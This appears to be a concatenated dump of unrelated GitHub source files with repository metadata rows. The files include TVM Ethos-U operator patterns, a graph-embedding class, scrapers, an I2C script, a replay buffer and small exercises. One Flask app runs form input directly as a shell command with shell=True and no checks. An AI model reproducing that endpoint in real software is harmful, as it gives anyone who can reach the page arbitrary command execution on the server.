if self.is_qnn_variant and not all(self.input_zero_points == self.input_zero_points[0]):
return False
input_dim = len(self.input_tensors[0].shape)
for tensor in self.input_tensors:
if len(tensor.shape) != input_dim:
return False
if self.axis is None:
return False
if self.axis < 0:
return False
if self.axis >= input_dim:
return False
output_shape = self.concat.checked_type.shape
if len(output_shape) != input_dim:
return False
if len(output_shape) > 3 and output_shape[0] != 1:
return False
return True
def concat_pattern():
"""Create pattern for concat"""
tensors = is_tuple(None)
scales = is_tuple(None)
zero_points = is_tuple(None)
qnn_concat = is_op("qnn.concatenate")(
tensors, scales, zero_points, is_constant(), is_constant()
)
concat = is_op("concatenate")(tensors)
return concat | qnn_concat
class SplitParams:
"""
This class will parse a call to a ethos-u.split composite function
and extract the parameter information.
"""
composite_name = "ethos-u.split"
def __init__(self, func_body):
self.split = func_body
self.input = TensorParams(func_body.args[0])
self.axis = func_body.attrs.axis
self.indices_or_sections = self.convert_indices_or_sections(
func_body.attrs.indices_or_sections
)
def convert_indices_or_sections(self, indices_or_sections):
# split_v
if isinstance(indices_or_sections, tvm.ir.container.Array):
values = [i.value for i in indices_or_sections]
# split
else:
values = indices_or_sections.value
return values
def is_valid(self):
"""Checks whether split has compatible attributes with the hardware"""
if not check_valid_dtypes([self.input], supported_dtypes=[np.int8]):
return False
return True
def split_pattern():
"Create the pattern for split"
split = is_op("split")(wildcard())
return split
class RequantizeParams:
"""
This class will parse a call to ethos-u.requantize composite function
and extract the parameter information.
"""
composite_name = "ethos-u.requantize"
def __init__(self, func_body: Call):
from tvm.relay.backend.contrib.ethosu.util import RequantArgs
layout = "NHWC"
in_var = func_body.args[0]
requantize = func_body
self.ifm = TensorParams(
in_var,
layout=layout,
scale=requantize.args[RequantArgs.IFM_SCALE.value],
zero_point=requantize.args[RequantArgs.IFM_ZERO_POINT.value],
)
self.ofm = TensorParams(
requantize,
layout=layout,
scale=requantize.args[RequantArgs.OFM_SCALE.value],
zero_point=requantize.args[RequantArgs.OFM_ZERO_POINT.value],
)
attrs = requantize.attrs
self.out_dtype = attrs.out_dtype
def is_valid(self) -> bool:
"""
Checks whether qnn.requantize has compatible attributes with HW.
"""
tensor_params = [self.ifm, self.ofm]
if not check_valid_dtypes(tensor_params, supported_dtypes=[np.int8]):
return False
if not check_dimensions(self.ifm) or not check_dimensions(self.ofm):
return False
if self.out_dtype and self.out_dtype != "int8":
return False
return True
def requantize_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for qnn.requantize.
"""
return is_op("qnn.requantize")(
wildcard(), is_constant(), is_constant(), is_constant(), is_constant()
)
class Resize2dParams:
"""
This class will parse a call to ethos-u.resize2d composite function
and extract the parameter information.
"""
composite_name = "ethos-u.resize2d"
def __init__(self, func_body: Call):
layout = "NHWC"
resize_2d = func_body
in_var = func_body.args[0]
if (
isinstance(resize_2d, tvm.relay.expr.Call)
and isinstance(resize_2d.op, tvm.ir.Op)
and resize_2d.op.name == "qnn.quantize"
):
resize_2d = resize_2d.args[0]
in_var = in_var.args[0].args[0]
out_var = func_body
self.ifm = TensorParams(in_var, layout=layout)
self.ofm = TensorParams(out_var, layout=layout)
attrs = resize_2d.attrs
self.size = attrs.size
self.method = attrs.method
self.roi = attrs.roi
self.coordinate_transformation_mode = attrs.coordinate_transformation_mode
self.rounding_method = attrs.rounding_method
self.out_dtype = attrs.out_dtype
def is_valid(self) -> bool:
"""
Checks whether image.resize2d has compatible attributes with HW.
"""
def check_compatible_size(mode, method, upscale_size, ifm_size):
"""Checking the provided upscale_size is compatible with the NPU. The NPU only
supports upsampling when the upsampling size is 2 * input_size, or when there is
no upsampling to be done, so check that this is the case. In the special case of
resize_bilinear with align_corners=True, the NPU only supports an upsampling
size of 2 * input_size - 1."""
delta = 1 if mode == "align_corners" and method == "linear" else 0
upscale_size = np.array(upscale_size)
ifm_size = np.array(ifm_size)
ifm_upscaled = ifm_size * 2 - delta
return (ifm_upscaled == upscale_size).all() or (ifm_size == upscale_size).all()
tensor_params = [self.ifm, self.ofm]
if not check_valid_dtypes(tensor_params, supported_dtypes=[np.int8]):
return False
if len(self.ifm.shape) != 4 or len(self.ofm.shape) != 4:
return False
if list(float(x) for x in self.roi) != [0.0] * 4:
return False
if self.method not in ("nearest_neighbor", "linear"):
return False
if self.coordinate_transformation_mode not in ("asymmetric", "align_corners"):
return False
if not check_compatible_size(
self.coordinate_transformation_mode,
self.method,
self.size,
self.ifm.shape[1:3],
):
return False
if self.rounding_method != "":
return False
if self.out_dtype and self.out_dtype != "int8":
return False
return True
def resize2d_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for image.resize2d.
"""
dequant = is_op("qnn.dequantize")(wildcard(), is_constant(), is_constant())
resize_2d = is_op("image.resize2d")(dequant).has_attr({"method": "linear"})
quant = is_op("qnn.quantize")(resize_2d, is_constant(), is_constant())
return quant | is_op("image.resize2d")(wildcard()).has_attr({"method": "nearest_neighbor"})
class ExpandDimsParams:
"""
This class will parse a call to a ethos-u.expand_dims composite function
and extract the parameter information.
"""
composite_name = "ethos-u.expand_dims"
def __init__(self, func_body):
self.expand_dims = func_body
self.input = TensorParams(func_body.args[0])
self.output = TensorParams(func_body)
def is_valid(self):
"""Checks whether expand_dims has compatible attributes with the hardware."""
if not check_dimensions(self.input) or not check_dimensions(self.output):
return False
if not check_valid_dtypes([self.input, self.output], supported_dtypes=[np.int8]):
return False
return True
def expand_dims_pattern():
"""Create the pattern for expand_dims."""
return is_op("expand_dims")(wildcard())
class SqueezeParams:
"""
This class will parse a call to a ethos-u.squeeze composite function
and extract the parameter information.
"""
composite_name = "ethos-u.squeeze"
def __init__(self, func_body):
self.squeeze = func_body
self.input = TensorParams(func_body.args[0])
self.output = TensorParams(func_body)
def is_valid(self):
"""Checks whether squeeze has compatible attributes with the hardware."""
if not check_dimensions(self.output):
return False
if not check_valid_dtypes([self.input, self.output], supported_dtypes=[np.int8]):
return False
return True
def squeeze_pattern():
"""Create the pattern for squeeze."""
return is_op("squeeze")(wildcard())
class FullyConnectedParams:
"""
This class will parse a call to an ethos-u.fully_connected composite
function and extract the parameter information.
"""
composite_name = "ethos-u.fully_connected"
@requires_vela
def __init__(self, func_body):
from tvm.relay.backend.contrib.ethosu.util import QDenseArgs # type: ignore
from tvm.relay.backend.contrib.ethosu.util import BiasAddArgs
from tvm.relay.backend.contrib.ethosu.util import RequantArgs
self.activation = None
if str(func_body.op) == "clip":
self.activation = func_body
requantize_op = self.activation.args[0]
else:
requantize_op = func_body
call = requantize_op.args[0]
if str(requantize_op.args[0].op) == "nn.bias_add":
bias_add = call
qnn_dense = call.args[0]
else:
bias_add = None
qnn_dense = call
# weights & biases are params as they should be constant
self.weights = TensorParams(
qnn_dense.args[QDenseArgs.WEIGHTS.value],
None,
qnn_dense.args[QDenseArgs.WEIGHTS_SCALE.value],
qnn_dense.args[QDenseArgs.WEIGHTS_ZERO_POINT.value],
)
self.biases = (
TensorParams(
bias_add.args[BiasAddArgs.BIASES.value],
None,
requantize_op.args[RequantArgs.IFM_SCALE.value],
requantize_op.args[RequantArgs.IFM_ZERO_POINT.value],
)
if bias_add
else None
)
self.ifm = TensorParams(
qnn_dense.args[QDenseArgs.IFM.value],
None,
qnn_dense.args[QDenseArgs.IFM_SCALE.value],
qnn_dense.args[QDenseArgs.IFM_ZERO_POINT.value],
)
self.ofm = TensorParams(
func_body,
None,
requantize_op.args[RequantArgs.OFM_SCALE.value],
requantize_op.args[RequantArgs.OFM_ZERO_POINT.value],
)
def is_valid(self) -> bool:
"""
Checks whether Fully Connected has compatible attributes with HW
"""
def check_weights_fc(weights):
"""Checks whether weight tensor is compatible with HW"""
weights_limit = 127 * 65536
# A saturation upper bound check for accumulators
weights.values = weights.values - weights.q_params.zero_point
axis = 1
sum_weights = np.amax(np.sum(np.absolute(weights.values), axis=axis))
if not sum_weights <= weights_limit:
return False
return True
if not check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.int8]):
return False
if not check_weights_fc(self.weights):
return False
if not check_bias(self.biases):
return False
if not check_batch_size(self.ifm):
return False
# Check input shape
if not len(self.ifm.shape) == 2:
return False
# Check output shape
if not len(self.ofm.shape) == 2:
return False
return True
def qnn_fc_pattern():
dense = is_op("qnn.dense")(
wildcard(), is_constant(), is_constant(), is_constant(), is_constant(), is_constant()
)
optional_bias_add = is_op("nn.bias_add")(dense, is_constant())
req = is_op("qnn.requantize")(
dense | optional_bias_add, is_constant(), is_constant(), is_constant(), is_constant()
)
optional_clip = req.optional(is_op("clip"))
return optional_clip
@register_pattern_table("ethos-u")
def pattern_table() -> List[Tuple[str, tvm.relay.dataflow_pattern.DFPattern, Callable]]:
return [
(
QnnConv2DParams.composite_name,
qnn_conv2d_pattern(),
lambda pat: QnnConv2DParams(pat).is_valid(),
),
(
QnnDepthwiseConv2DParams.composite_name,
qnn_depthwise_conv2d_pattern(),
lambda pat: QnnDepthwiseConv2DParams(pat).is_valid(),
),
(
QnnConv2DTransposeParams.composite_name,
qnn_conv2d_transpose_pattern(),
lambda pat: QnnConv2DTransposeParams(pat).is_valid(),
),
(
FullyConnectedParams.composite_name,
qnn_fc_pattern(),
lambda pat: FullyConnectedParams(pat).is_valid(),
),
(
MaxPool2DParams.composite_name,
qnn_maxpool2d_pattern(),
lambda pat: MaxPool2DParams(pat).is_valid(),
),
(
AvgPool2DParams.composite_name,
qnn_avgpool2d_pattern(),
lambda pat: AvgPool2DParams(pat).is_valid(),
),
(
AddParams.composite_name,
qnn_add_pattern(),
lambda pat: AddParams(pat).is_valid(),
),
(
SubParams.composite_name,
qnn_subtract_pattern(),
lambda pat: SubParams(pat).is_valid(),
),
(
MulParams.composite_name,
qnn_mul_pattern(),
lambda pat: MulParams(pat).is_valid(),
),
(
MinParams.composite_name,
minimum_pattern(),
lambda pat: MinParams(pat).is_valid(),
),
(
MaxParams.composite_name,
maximum_pattern(),
lambda pat: MaxParams(pat).is_valid(),
),
(
ShlParams.composite_name,
shl_pattern(),
lambda pat: ShlParams(pat).is_valid(),
),
(
ReshapeParams.composite_name,
reshape_pattern(),
lambda pat: ReshapeParams(pat).is_valid(),
),
(
StridedSliceParams.composite_name,
strided_slice_pattern(),
lambda pat: StridedSliceParams(pat).is_valid(),
),
(
AbsParams.composite_name,
abs_pattern(),
lambda pat: AbsParams(pat).is_valid(),
),
(TanhParams.composite_name, tanh_pattern(), lambda pat: TanhParams(pat).is_valid()),
(
MeanParams.composite_name,
mean_pattern(),
lambda pat: MeanParams(pat).is_valid(),
),
(
LeakyReLUParams.composite_name,
leaky_relu_pattern(),
lambda pat: LeakyReLUParams(pat).is_valid(),
),
(ConcatParams.composite_name, concat_pattern(), lambda pat: ConcatParams(pat).is_valid()),
(
SigmoidParams.composite_name,
sigmoid_pattern(),
lambda pat: SigmoidParams(pat).is_valid(),
),
(
SplitParams.composite_name,
split_pattern(),
lambda pat: SplitParams(pat).is_valid(),
),
(
RequantizeParams.composite_name,
requantize_pattern(),
lambda pat: RequantizeParams(pat).is_valid(),
),
(
Resize2dParams.composite_name,
resize2d_pattern(),
lambda pat: Resize2dParams(pat).is_valid(),
),
(
ExpandDimsParams.composite_name,
expand_dims_pattern(),
lambda pat: ExpandDimsParams(pat).is_valid(),
),
(
SqueezeParams.composite_name,
squeeze_pattern(),
lambda pat: SqueezeParams(pat).is_valid(),
),
]
# pylint: disable=unused-argument
@requires_vela
def partition_for_ethosu(
mod: tvm.ir.IRModule,
params: Optional[Dict[str, tvm.runtime.NDArray]] = None,
mod_name: str = "default",
**opts,
):
"""This helper function partition the relay graph as produced by the
relay frontend for a given model into external functions
to be presented to the codegen.
Parameters
----------
mod : tvm.ir.IRModule
The IRModule that gets generated from a relay frontend
params : Optional[Dict[str, tvm.runtime.NDArray]]
Constant input parameters.
mod_name: str, optional
The module name
Returns
-------
mod : IRModule
The partitioned IRModule with external global functions
"""
from tvm.relay.backend.contrib.ethosu import preprocess
if params:
mod["main"] = bind_params_by_name(mod["main"], params)
pattern = relay.op.contrib.get_pattern_table("ethos-u")
mod = relay.transform.InferType()(mod)
mod = relay.transform.MergeComposite(pattern)(mod)
mod = relay.transform.AnnotateTarget("ethos-u")(mod)
mod = relay.transform.MergeCompilerRegions()(mod)
mod = relay.transform.InferType()(mod)
mod = relay.transform.PartitionGraph(mod_name)(mod)
mod = relay.transform.InferType()(mod)
mod = preprocess.preprocess_ext_io()(mod)
return mod
| [
"noreply@github.com"
] | UofT-EcoSystem.noreply@github.com |
4c5149cb2165bdc4a1dae9c327c7e46bc017c69a | 7010168d220138f9042e19575a5d605cd05ad7fc | /finalproject/GraRep.py | c8b603a8a173b3d006b7586f94a3505f2ef874ab | [] | no_license | ztypl/MLexp | 9ff01534d53e7bc03422e9051ed471f797738aea | 52bcb93fdbbfc6448d721f12ee341ddbd12cbdc7 | refs/heads/master | 2020-03-21T03:04:29.974293 | 2018-07-04T09:41:09 | 2018-07-04T09:41:09 | 138,035,524 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,667 | py | # coding : utf-8
# create by ztypl on 2018/6/12
import numpy as np
import sys
from scipy import sparse
class GraRep:
def __init__(self, **kwargs):
self.lbd = kwargs['lbd']
self.d = kwargs['d']
self.k = kwargs['k']
self.N = None
def embedding_sparse(self, S):
S = sparse.csc_matrix(S)
self.N = S.shape[0]
Di = 1. / np.asarray(S.sum(axis=0)).reshape(-1)
A = sparse.diags(Di) @ S
Ak = sparse.identity(self.N)
W = np.empty((self.N, 0))
for k in range(1, self.k+1):
Ak = Ak @ A
Gamma_k = Ak.sum(axis=0)
Xk = Ak.multiply(self.N / self.lbd / Gamma_k)
Xk.data = np.log(Xk.data)
Xk.data[Xk.data < 0.0] = 0.0
Xk.data[(Xk.data == np.inf) | (Xk.data == np.nan)] = 0.0
Uk, sk, _ = sparse.linalg.svds(Xk, k=self.d)
Wk = Uk @ np.diag(np.sqrt(sk))
W = np.hstack((W, Wk))
sys.stdout.flush()
return W
def embedding(self, S):
self.N = S.shape[0]
Di = 1. / np.asarray(S.sum(axis=0)).reshape(-1)
A = np.diag(Di) @ S
Ak = np.identity(self.N)
W = np.empty((self.N, 0))
for k in range(1, self.k+1):
Ak = Ak @ A
Gamma_k = Ak.sum(axis=0)
Xk = np.log(Ak / Gamma_k) - np.log(self.lbd / self.N)
Xk[Xk < 0.0] = 0.0
Xk[(Xk == np.inf) | (Xk == np.nan)] = 0.0
uk, sk, _ = np.linalg.svd(Xk)
Uk = uk[:, :self.d]
Sk = sk[:self.d]
Wk = Uk @ np.diag(np.sqrt(Sk))
W = np.hstack((W, Wk))
return W
| [
"ztypl@MyDLVM-Linux.ftbrctscb3cunj22geayv2bsmd.bx.internal.cloudapp.net"
] | ztypl@MyDLVM-Linux.ftbrctscb3cunj22geayv2bsmd.bx.internal.cloudapp.net |
b37967cd5cef86d17445269b33e9211c1d7ab0f3 | 365697540428f1a3c5c2f587939805af97fe5766 | /yp.py | cd1e4fa80d3c10713408134711c9f697bb0b07ec | [] | no_license | enlys/python | 24dcc53d72e593621f8d77474610d8c18c55e0b2 | 2a415423ec6014b2df381c9c1f7ab878f689ef95 | refs/heads/master | 2020-04-07T02:56:08.280275 | 2018-11-17T15:24:52 | 2018-11-17T15:24:52 | 157,995,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | import requests
import json
import re
headers={"User-Agent":"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Mobile Safari/537.36;"}
rr=requests.get("https://www.ximalaya.com/revision/play/album?albumId=16046207&pageNum=1&pageSize=30",headers=headers)
ret=rr.content.decode()
di=json.loads(ret)
lists=di['data']['tracksAudioPlay']
for i in lists:
src=i['src']
name=i['trackName']
print(src,name)
with open('{}.m4a'.format(name),'ab') as f:
music=requests.get(src,headers=headers)
f.write(music.content) | [
"noreply@github.com"
] | enlys.noreply@github.com |
6e7cabaa37307fe2662486cac498a34a84fa741f | 5388b791b6d2eb56230920a261c655b149b6e40d | /python-pdaadhat/pdaadhat/pdaadhat.py | 4599939f68fd95229f9afd599fe692748c63e482 | [
"MIT"
] | permissive | toschoch/power-daad-breakout-hat | 320ca282c0e247541f52e1525aedd43ea6e46e6f | 14732f532225825dfc93ddba189ae369f450e0d3 | refs/heads/master | 2021-01-09T19:26:30.184235 | 2020-04-13T11:04:48 | 2020-04-13T11:04:48 | 242,430,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | from smbus import SMBus
b = SMBus(1) # 1 indicates /dev/i2c-1
dev_addr1 = 0x10
dev_addr2 = 0x11
general_purpose_register = 0x03
dac_pin_config_register = 0x05
dac_out0_register = 0x10
# set I/O0 of dev 0 to dac output
b.write_word_data(dev_addr1, dac_pin_config_register, 0x0001)
# set I/O0 to 1000/4095 -> 0x3e8
b.write_word_data(dev_addr1, dac_out0_register, 0x83e8)
print("{:x}".format(b.read_word_data(dev_addr1, general_purpose_register)))
| [
"tobias.schoch@vtxmail.ch"
] | tobias.schoch@vtxmail.ch |
4e5035989a8b27bbf1e9c337ad7aa29d4a3dde48 | d654f11c3e1b0fbcfd83926ae437190e05cdcd13 | /src/scraping/process_raw_user_scraping.py | ac5c77f9bad3aded053bed62ecddcb211cfa7378 | [] | no_license | pixelatedbrian/Indie-Game-Recommender | b06d6c1cc36d91781cedeaf4ace85a7e32219300 | 76fb770b221841d44b5d45bd1782077779ee29a3 | refs/heads/master | 2018-09-23T22:59:13.190148 | 2018-06-15T20:54:15 | 2018-06-15T20:54:15 | 95,802,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,406 | py | '''
Read in raw user webpages from MongoDB and extract the games that the user
has played as well as how many hours the user has played each game
Create a master dictionary that contains the user_id: val for one key/value
pair and then create a data: {} key/value pair where the dictionary value is
a dictionary of the game titles that a user has and then the hours that the
user has played the game.
'''
# import MongoDB modules
from pymongo import MongoClient
# can always use more time
import time
def insert(collection, dictionary, match_key):
'''
Abstracted insert method which, attempts to add the dictionary to the
provided collection in MongoDB.
The method attempts to avoid duplicate inserts by checking the collection
to see if there's already an item who's key matches the one being inserted.
If there is a matching item then the new one is not inserted.
'''
if not collection.find_one({match_key: dictionary[match_key]}):
try:
collection.insert_one(dictionary)
print "inserted", dictionary[match_key]
except Exception, e:
print "Execption when attempting to insert into collection:", e
else:
print match_key, "already exists"
def get_userinfo_from_doc(document):
'''
Extracts the user info from the user all games owned website into a dictionary with the username as one
key/value and then a list of user_game_data as the user_game_data value.
Ex: {"user": "bob", user_game_data: [{game_1}, {game_2"}, {etc}]}
Ex: game_1 = {"game_name":_name, "app_id":_appid, "hours_played":_hours_played, "last_played":_last_played}
returns:
the dictionary specified above
'''
data = document["data"].lower()
try:
# remove useless front part of data
data = data[data.index("var rggames = [".lower()):(3+data.index("}}];".lower()))]
# attempt to split the block of game info into sub-blocks specific to each game
raw_user_game_data = data.split("},{")
# be overly explicit in where each variable will be stored which will assemble
# the dictionary specific for each user's game playtime, name, etc
# _name = ""
# _appid = ""
# _hours_played = ""
# _last_played = ""
# make a list to hold the individual game info dictionaries
game_info = []
# raw_user_data is a list of game data so walk over that and process each
# item into a dictionary to be added to the overall user profile
for raw_game_info in raw_user_game_data:
# split the individual raw_game_info into each specific attribute
raw_game_attributes = raw_game_info.split(",")
# walk all of the attributes
for item in raw_game_attributes:
# print attribute
if "appid" in item:
_appid = item.split(":")[1]
if "name" in item:
_name = item[7:]
if "hours_forever" in item:
_hours_played = float(item.split(":")[1].strip('"'))
if "last_played" in item:
_last_played = int(item.split(":")[1])
this_game_info_dict = {"game_name":_name, "app_id":_appid, "hours_played":_hours_played, "last_played":_last_played}
#print
game_info.append(this_game_info_dict)
#print this_game_info_dict
#print sub_info
# make the total player game data dictionary:
player_dict = {"player":document["user"], "game_data": game_info}
# return to caller
return player_dict
except Exception, e:
print "Failed to process user_page:", document["user"]
return None
def digest_user_info_into_collection(source_collection, destination_collection):
'''
Takes in a source collection of MongoDB. For each document in that collection
call get_userinfo_from_doc to extra the data that we need. Temporarily
store that information and then insert it into the destination_collection.
'''
start_size = destination_collection.find().count()
print "Length of destination collection at start:", start_size
print
# pause for a few minutes so user can see starting size of collection
time.sleep(3)
# loop over source_collection
for doc in source_collection.find():
# extract data from raw web page into a dictionary
temp_data = get_userinfo_from_doc(doc)
# make sure that processing didn't fail
if temp_data != None:
# add the cleaned data to the proper collection
insert(destination_collection, temp_data, "player")
# after the work is done check the finished size
final_size = destination_collection.find().count()
# print how many items were added to the collection
print
print "Added", final_size - start_size, "to the collection."
if __name__ == '__main__':
# connect to the hosted MongoDB instance with the database that we want
db = MongoClient('mongodb://localhost:27017/')["capstone"]
# collection to pull scraped information from
source_collection = db.raw_user_scrape
# collection to store digested information in
dest_collection = db.user_data_digest
digest_user_info_into_collection(source_collection, dest_collection)
| [
"bhardens@yahoo.com"
] | bhardens@yahoo.com |
503494cb23fd10bfb9415c87cba1dfd294b8102b | cf8c6085efbe3a599415f99752b2563dec88be0b | /navigation/utils/replay_buffer.py | 9f8146a2fd1054ad411ac7aba6f26057062c2c8b | [] | no_license | NehrenD/deeprl_nanodegree | 7e631c0dd2d377846997d3f7c59d60348929ada2 | 7ea5f122f90db25bd03b3bdcc77e1abdbbd0c7a8 | refs/heads/master | 2022-11-14T16:19:39.051344 | 2020-07-13T21:49:33 | 2020-07-13T21:49:33 | 263,177,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | import torch
from collections import deque,namedtuple
import numpy as np
device = 'cpu'
class ReplayBuffer:
def __init__(self, action_size, buffer_size, batch_size, seed):
self.action_size = action_size
self.memory = deque(maxlen=buffer_size)
self.batch_size = batch_size
self.experience = namedtuple("Experience", field_names=["state", "action", "reward", "next_state", "done"])
np.random.seed(seed)
def add(self, state, action, reward, next_state, done):
"""Add a new experience to memory."""
e = self.experience(state, action, reward, next_state, done)
self.memory.append(e)
def sample(self):
"""Randomly sample a batch of experiences from memory."""
experiences = [self.memory[idx] for idx in
np.random.choice(list(range(len(self.memory))), size=self.batch_size)]
# experiences = np.random.choice(self.memory, size=self.batch_size)
states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device)
actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).long().to(device)
rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device)
next_states = torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(
device)
dones = torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(
device)
return (states, actions, rewards, next_states, dones)
def __len__(self):
"""Return the current size of internal memory."""
return len(self.memory) | [
"thenehrens@yahoo.com"
] | thenehrens@yahoo.com |
0bb69fd3581d92903e2200dd01a5cf67f1215a6a | 912945a58d485956f5222bad7adc1930f61d1593 | /TIL/SWEA/D2/swea_4866.py | 302fd69a1b5120dedec668f68c3f3ea91d18437a | [] | no_license | jeong-hyejin/Algorithm | 27a36b4dedde37a59f2318204c7d724e79ebec4b | 2e4654cfb6ba2448e217c5819e0582749b14d487 | refs/heads/master | 2022-12-17T16:19:11.862171 | 2020-09-22T14:37:11 | 2020-09-22T14:37:11 | 286,981,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,257 | py | '''
input을 순호하면서 '('과 '{'이면 stack에 push
')'과 '}'이면 1. 스택이 비어 있지 않고 2. stack의 마지막 값이 짝이 맞다면 pop!
stack이 비어있지 않으면 0을 리턴하고 비어있다면 1을 리턴
'''
T = int(input())
for tc in range(1, T+1):
print('#{}'.format(tc), end=" ")
def check(arr):
stack = []
for i in arr:
# if i == '(' or c == '{':
# stack.append(i)
if i == '(':
stack.append(i)
elif i == '{':
stack.append(i)
elif i == ')':
if stack:
if stack[-1] == '(':
stack.pop(-1)
continue
if stack[-1] == '{':
return 0
else:
return 0
elif i == '}':
if stack:
if stack[-1] == '{':
stack.pop(-1)
continue
if stack[-1] == '(':
return 0
else:
continue
if stack:
return 0
else:
return 1
arr = input()
print(check(arr)) | [
"9jung6@naver.com"
] | 9jung6@naver.com |
a015c92f8a50466142a0f27f917b1554f064396c | da0a4ddb0b8e97574a60fc4b2d7eddfafc2d39c3 | /arg_parse.py | 33cb69891ec4a42aeb5e20f138cc79be09db2bab | [] | no_license | jmccutchan/GA_homework | 577221297ffc10f0a173af101252d07c21222473 | 60c15feb222b00c92bef8b0c7e6523d1fb98aec4 | refs/heads/master | 2021-01-21T00:21:13.096333 | 2014-03-07T07:24:43 | 2014-03-07T07:24:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,182 | py | import argparse
from sklearn import datasets
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn import cross_validation
import numpy as np
def loadIris(): #returns the data and labels for the iris dataset
iris=datasets.load_iris() #load the needed dataset
irisX = iris.data #the data is four columns per record - petal length/width
#and sepal length/width
irisY = iris.target #this is the classification to iris types
#(Setosa, Versicolour, and Virginica)
return irisX,irisY
def makeKNN():
knn = KNeighborsClassifier() #Initialize a KNN classifier
return knn
def makeBayes():
gnb = GaussianNB() #Initialize a bayesian classifier
return gnb
def doCrossVal(nfold,func,dataX,dataY):
#Performs cross validation for Bayes or KNN
#given the number of folds to partition the input data into
classifier=func()
np.random.seed() #initialize random number generator
#cross_val_score trains the appropriate model and performs cross validation
#giving the accuracy score for each fold
scores=cross_validation.cross_val_score(classifier,dataX,dataY,
cv=nfold,scoring='accuracy')
return scores
folds= [2,3,5,10,15,30,50,75]
irisX,irisY=loadIris()
parser = argparse.ArgumentParser()
parser.add_argument("knn",nargs="*")
parser.add_argument("nb",nargs="*")
args = parser.parse_args()
if args.knn:
for n in folds:
print "\nPerforming {}-fold cross-validation using a KNN calssifier:".format(n)
scores=doCrossVal(n,makeKNN,irisX,irisY)
print "The accuracies for each fold-test are: "+ ",".join(map(str,scores))
print "The mean accuracy of the KNN classifier is {}".format(scores.mean())
elif args.nb:
for n in folds:
print "\nPerforming {}-fold cross-validation using a Bayesian calssifier:".format(n)
scores=doCrossVal(n,makeBayes,irisX,irisY)
print "The accuracies for each fold-test are: "+ ",".join(map(str,scores))
print "The mean accuracy of the Bayesian classifier is {}".format(scores.mean())
| [
"mccutchanjames@gmail.com"
] | mccutchanjames@gmail.com |
e14cf92464ea50f5d578c4e36687e6ec65a07426 | 2511ad2a4e41c17c5c76b353de855090e23d45f5 | /app.py | e8afbc61c64f9211f387459265bda884d17395a7 | [] | no_license | alexbumpers/stract | 15c950ed43ce58cb1f492d169f70d3b5d42d3a6c | f847867d3197cdf87fc49e26bd2d78178f9390a3 | refs/heads/master | 2020-05-07T21:56:08.558661 | 2019-04-13T04:19:45 | 2019-04-13T04:19:45 | 180,925,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,112 | py | from flask import Flask, request, render_template
import os
import subprocess
import logging
logging.basicConfig(level=logging.DEBUG)
app = Flask(__name__)
if __name__ == '__main__':
app.jinja_env.auto_reload = True
app.config['TEMPLATES_AUTO_RELOAD'] = True
app.run(debug=True, host='0.0.0.0:3000')
def write_to_history(shell_data):
f = open("history.txt", "a")
f.write(shell_data + "\n")
# Currently no error handling, so non-commands will fail non-gracefully.
def execute_command(command):
f = open("shell.txt", "a")
f.write(command + '\n')
subprocess.check_call('{}'.format(command), shell=True, stdout=f)
write_to_history(command)
f.close()
@app.route('/', methods=['GET', 'POST'])
def lsof_output():
if request.method == 'GET':
op = open("shell.txt", "r").read()
return render_template('index.html', output=op)
if request.method == 'POST':
port = request.form.to_dict()
port = port['port']
execute_command(port)
op = open("shell.txt", "r").read()
return render_template('index.html', output=op) | [
"apbumpers@gmail.com"
] | apbumpers@gmail.com |
255a081f17a2d0cc12397f5c24ab00bc3d57e454 | b5611baa02848546b0f25b16ceb24e5864afefee | /4-3/sunset.py | 843c9fd19ce645473b7a0132ad7c3f90fe554f7d | [] | no_license | codingfan0704/hajimeteno_computer_sience | 59920c6a91f72608bc46b4fa22941609291ba7bb | 7f674a2981b0ba3a9101672597f0ae42b190a409 | refs/heads/master | 2020-04-18T21:54:57.067407 | 2012-01-26T10:30:27 | 2012-01-26T10:30:27 | 3,271,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | #encoding: utf8
import media
pic = media.load_picture('207.jpg')
media.show(pic)
for p in media.get_pixels(pic):
new_blue = int(0.7 * media.get_blue(p))
new_green = int(0.7 * media.get_green(p))
media.set_blue(p, new_blue)
media.set_green(p, new_green)
media.show(pic) | [
"coding6935fan@gmail.com"
] | coding6935fan@gmail.com |
7a6974e07b365dfc148c9dc74ab452fd7af7203b | e13b7175ea8b863ab055f8e78b561512e2d4819a | /code/kmeans.py | da4aee6cbfe4186aea8e3fd5223c73d49d99f76f | [
"MIT"
] | permissive | UF-AI/2018DataScienceBowl | 5d6c95c54353534fe9d8c360bb8f34af631a5de4 | 954fbd59c9cd3621d8dc94d48fdf9b1da0e43d1d | refs/heads/master | 2021-05-10T09:23:47.146371 | 2018-01-25T16:40:26 | 2018-01-25T16:40:26 | 118,926,273 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,740 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Jan 20 00:57:24 2018
@author: mason rawson
"""
import tensorflow as tf
import os
import sys
import numpy as np
import random
import math
import warnings
import pandas as pd
import sklearn
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
#import cv2
import matplotlib.pyplot as plt
from skimage.io import imread, imshow, imread_collection, concatenate_images,show
from skimage.transform import resize
from skimage.morphology import label
from itertools import chain
#%%
# Set some parameters
IMG_WIDTH = 350
